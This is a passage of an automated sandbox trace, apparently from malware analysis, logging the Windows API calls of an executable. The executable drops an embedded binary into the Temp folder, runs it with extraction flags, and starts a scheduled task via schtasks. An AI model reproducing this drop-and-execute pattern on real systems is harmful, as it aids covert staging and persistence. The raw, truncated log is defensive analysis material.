xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x10\x07\x01\x59\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0297.221] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0297.221] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0297.222] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0297.222] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0297.222] GetCurrentProcess () returned 0xffffffff [0297.222] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0297.222] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0297.222] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0297.222] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0297.222] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0297.222] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0297.222] LockResource (hResData=0x43c648) returned 0x43c648 [0297.222] GetCurrentPackageId () returned 0x3d54 [0297.222] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0297.346] GetFileType (hFile=0x170) returned 0x1 [0297.346] WriteFile (in: hFile=0x170, lpBuffer=0x43c648*, nNumberOfBytesToWrite=0x37000, lpNumberOfBytesWritten=0x19defc, lpOverlapped=0x0 | out: lpBuffer=0x43c648*, lpNumberOfBytesWritten=0x19defc*=0x37000, lpOverlapped=0x0) returned 1 [0297.349] WriteFile (in: hFile=0x170, lpBuffer=0x592bf0*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x19def8, lpOverlapped=0x0 | out: lpBuffer=0x592bf0*, lpNumberOfBytesWritten=0x19def8*=0x490, lpOverlapped=0x0) returned 1 [0297.349] CloseHandle (hObject=0x170) returned 1 [0297.349] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0297.349] CreateProcessW (in: lpApplicationName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe", lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fac4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fb08 | out: lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x19fb08*(hProcess=0x174, hThread=0x170, dwProcessId=0xcc4, dwThreadId=0xcc8)) returned 1 [0298.027] WaitForSingleObject (hHandle=0x174, dwMilliseconds=0xffffffff) Thread: id = 1005 os_tid = 0xca8 Process: id = "147" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x5b9b2000" os_pid = "0xc7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "138" os_parent_pid = "0xa70" cmd_line = "schtasks /Run /I /tn DSHCA" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10046 start_va = 0x40000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 10047 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 10048 start_va = 0x70000 end_va = 0x83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 10049 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 10050 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 10051 start_va = 0x110000 end_va = 0x113fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 10052 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "schtasks.exe" filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe") Region: id = 10053 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 10054 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10055 start_va = 0x7efc0000 end_va = 0x7efe2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efc0000" filename = "" Region: id = 10056 start_va = 0x7efe8000 end_va = 0x7efe8fff entry_point = 0x0 region_type = private name = "private_0x000000007efe8000" filename = "" Region: id = 10057 start_va = 0x7efeb000 end_va = 0x7efebfff entry_point = 0x0 region_type = private name = "private_0x000000007efeb000" filename = "" Region: id = 10058 start_va = 0x7efed000 end_va = 0x7efeffff entry_point = 0x0 region_type = private name = "private_0x000000007efed000" filename = "" Region: id = 10059 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10060 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10061 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 10062 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10063 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10064 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 10065 start_va = 0x130000 end_va = 0x131fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 10092 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 10093 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10094 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10095 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10096 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10097 start_va = 0x200000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 10098 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10099 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10100 start_va = 0x40000 end_va = 0x4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10101 start_va = 0x7eec0000 end_va = 0x7efbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eec0000" filename = "" Region: id = 10110 start_va = 0x200000 end_va = 0x2bdfff entry_point = 0x200000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10111 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 10112 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10113 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10114 start_va = 0x140000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 10115 start_va = 0x180000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 10116 start_va = 0x76ce0000 end_va = 0x76d71fff entry_point = 0x76ce0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 10117 start_va = 0x7efe5000 end_va = 0x7efe7fff entry_point = 0x0 region_type = private name = "private_0x000000007efe5000" filename = "" Region: id = 10118 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 10119 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10120 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10121 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10122 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10123 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10124 start_va = 0x400000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10125 start_va = 0x400000 end_va = 0x4e8fff entry_point = 0x400000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 10126 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 10194 start_va = 0x1c0000 end_va = 0x1d2fff entry_point = 0x1c0000 region_type = mapped_file name = "schtasks.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui") Region: id = 10195 start_va = 0x5d0000 end_va = 0x906fff entry_point = 0x5d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 10196 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 10205 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 10206 start_va = 0x77670000 end_va = 0x776f1fff entry_point = 0x77670000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 10207 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 10208 start_va = 0x744b0000 end_va = 0x7453bfff entry_point = 0x744b0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Thread: id = 999 os_tid = 0xc84 [0297.000] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0297.000] __set_app_type (_Type=0x1) [0297.000] __p__fmode () returned 0x77984d6c [0297.000] __p__commode () returned 0x77985b1c [0297.000] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x10a0840) returned 0x0 [0297.001] __wgetmainargs (in: _Argc=0x10aade0, _Argv=0x10aade4, _Env=0x10aade8, _DoWildCard=0, _StartInfo=0x10aadf4 | out: _Argc=0x10aade0, _Argv=0x10aade4, _Env=0x10aade8) returned 0 [0297.001] _onexit (_Func=0x10a2bc0) returned 0x10a2bc0 [0297.001] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0297.001] WinSqmIsOptedIn () returned 0x0 [0297.001] RtlRestoreLastWin32Error () returned 0x0 [0297.001] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0297.001] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0297.001] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0297.001] RtlVerifyVersionInfo (VersionInfo=0x10f338, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0297.001] lstrlenW (lpString="") returned 0 [0297.002] SetThreadUILanguage (LangId=0x0) returned 0x409 [0297.120] RtlRestoreLastWin32Error () returned 0x0 [0297.120] _memicmp (_Buf1=0x307348, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.120] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3094a8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0297.120] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x10f444 | out: lpdwHandle=0x10f444) returned 0x76c [0297.122] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x309db0 | out: lpData=0x309db0) returned 1 [0297.122] VerQueryValueW (in: pBlock=0x309db0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10f44c, puLen=0x10f450 | out: lplpBuffer=0x10f44c*=0x30a160, puLen=0x10f450) returned 1 [0297.123] _memicmp (_Buf1=0x307348, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.123] _vsnwprintf (in: _Buffer=0x3094a8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x10f430 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0297.123] VerQueryValueW (in: pBlock=0x309db0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x10f45c, puLen=0x10f458 | out: lplpBuffer=0x10f45c*=0x309f88, puLen=0x10f458) returned 1 [0297.123] lstrlenW (lpString="schtasks.exe") returned 12 [0297.123] lstrlenW (lpString="schtasks.exe") returned 12 [0297.123] lstrlenW (lpString=".EXE") returned 4 [0297.123] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0297.124] lstrlenW (lpString="schtasks.exe") returned 12 [0297.124] lstrlenW (lpString=".EXE") returned 4 [0297.124] _memicmp (_Buf1=0x307348, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.124] lstrlenW (lpString="schtasks") returned 8 [0297.124] _memicmp (_Buf1=0x307360, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.124] _memicmp (_Buf1=0x307378, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.124] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x30a660, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0297.124] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0297.124] _vsnwprintf (in: _Buffer=0x3069e8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x10f434 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0297.125] RtlRestoreLastWin32Error () returned 0x0 [0297.125] GetThreadLocale () returned 0x409 [0297.125] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.125] lstrlenW (lpString="?") returned 1 [0297.125] GetThreadLocale () returned 0x409 [0297.125] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.125] lstrlenW (lpString="create") returned 6 [0297.125] GetThreadLocale () returned 0x409 [0297.125] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.125] lstrlenW (lpString="delete") returned 6 [0297.125] GetThreadLocale () returned 0x409 [0297.125] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.125] lstrlenW (lpString="query") returned 5 [0297.125] GetThreadLocale () returned 0x409 [0297.125] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.125] lstrlenW (lpString="change") returned 6 [0297.125] GetThreadLocale () returned 0x409 [0297.125] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.125] lstrlenW (lpString="run") returned 3 [0297.125] GetThreadLocale () returned 0x409 [0297.125] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.125] lstrlenW (lpString="end") returned 3 [0297.125] GetThreadLocale () returned 0x409 [0297.125] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.125] lstrlenW (lpString="showsid") returned 7 [0297.125] GetThreadLocale () returned 0x409 [0297.125] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.125] RtlRestoreLastWin32Error () returned 0x0 [0297.125] RtlRestoreLastWin32Error () returned 0x0 [0297.125] lstrlenW (lpString="/Run") returned 4 [0297.125] lstrlenW (lpString="-/") returned 2 [0297.125] StrChrIW (lpStart="-/", wMatch=0x5c002f) returned="/" [0297.125] lstrlenW (lpString="?") returned 1 [0297.125] lstrlenW (lpString="?") returned 1 [0297.125] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.125] lstrlenW (lpString="Run") returned 3 [0297.126] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.126] _vsnwprintf (in: _Buffer=0x3073c0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|?|") returned 3 [0297.126] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|Run|") returned 5 [0297.126] lstrlenW (lpString="|?|") returned 3 [0297.126] lstrlenW (lpString="|Run|") returned 5 [0297.126] RtlRestoreLastWin32Error () returned 0x490 [0297.126] lstrlenW (lpString="create") returned 6 [0297.126] lstrlenW (lpString="create") returned 6 [0297.126] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.126] lstrlenW (lpString="Run") returned 3 [0297.126] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.126] _vsnwprintf (in: _Buffer=0x309188, _BufferCount=0x9, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|create|") returned 8 [0297.126] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|Run|") returned 5 [0297.126] lstrlenW (lpString="|create|") returned 8 [0297.126] lstrlenW (lpString="|Run|") returned 5 [0297.126] StrStrIW (lpFirst="|create|", lpSrch="|Run|") returned 0x0 [0297.126] RtlRestoreLastWin32Error () returned 0x490 [0297.126] lstrlenW (lpString="delete") returned 6 [0297.126] lstrlenW (lpString="delete") returned 6 [0297.126] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.126] lstrlenW (lpString="Run") returned 3 [0297.127] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.127] _vsnwprintf (in: _Buffer=0x309188, _BufferCount=0x9, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|delete|") returned 8 [0297.127] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|Run|") returned 5 [0297.127] lstrlenW (lpString="|delete|") returned 8 [0297.127] lstrlenW (lpString="|Run|") returned 5 [0297.127] StrStrIW (lpFirst="|delete|", lpSrch="|Run|") returned 0x0 [0297.127] RtlRestoreLastWin32Error () returned 0x490 [0297.127] lstrlenW (lpString="query") returned 5 [0297.127] lstrlenW (lpString="query") returned 5 [0297.127] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.127] lstrlenW (lpString="Run") returned 3 [0297.127] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.127] _vsnwprintf (in: _Buffer=0x309188, _BufferCount=0x8, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|query|") returned 7 [0297.127] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|Run|") returned 5 [0297.127] lstrlenW (lpString="|query|") returned 7 [0297.127] lstrlenW (lpString="|Run|") returned 5 [0297.127] StrStrIW (lpFirst="|query|", lpSrch="|Run|") returned 0x0 [0297.127] RtlRestoreLastWin32Error () returned 0x490 [0297.127] lstrlenW (lpString="change") returned 6 [0297.127] lstrlenW (lpString="change") returned 6 [0297.127] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.127] lstrlenW (lpString="Run") returned 3 [0297.127] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.127] _vsnwprintf (in: _Buffer=0x309188, _BufferCount=0x9, 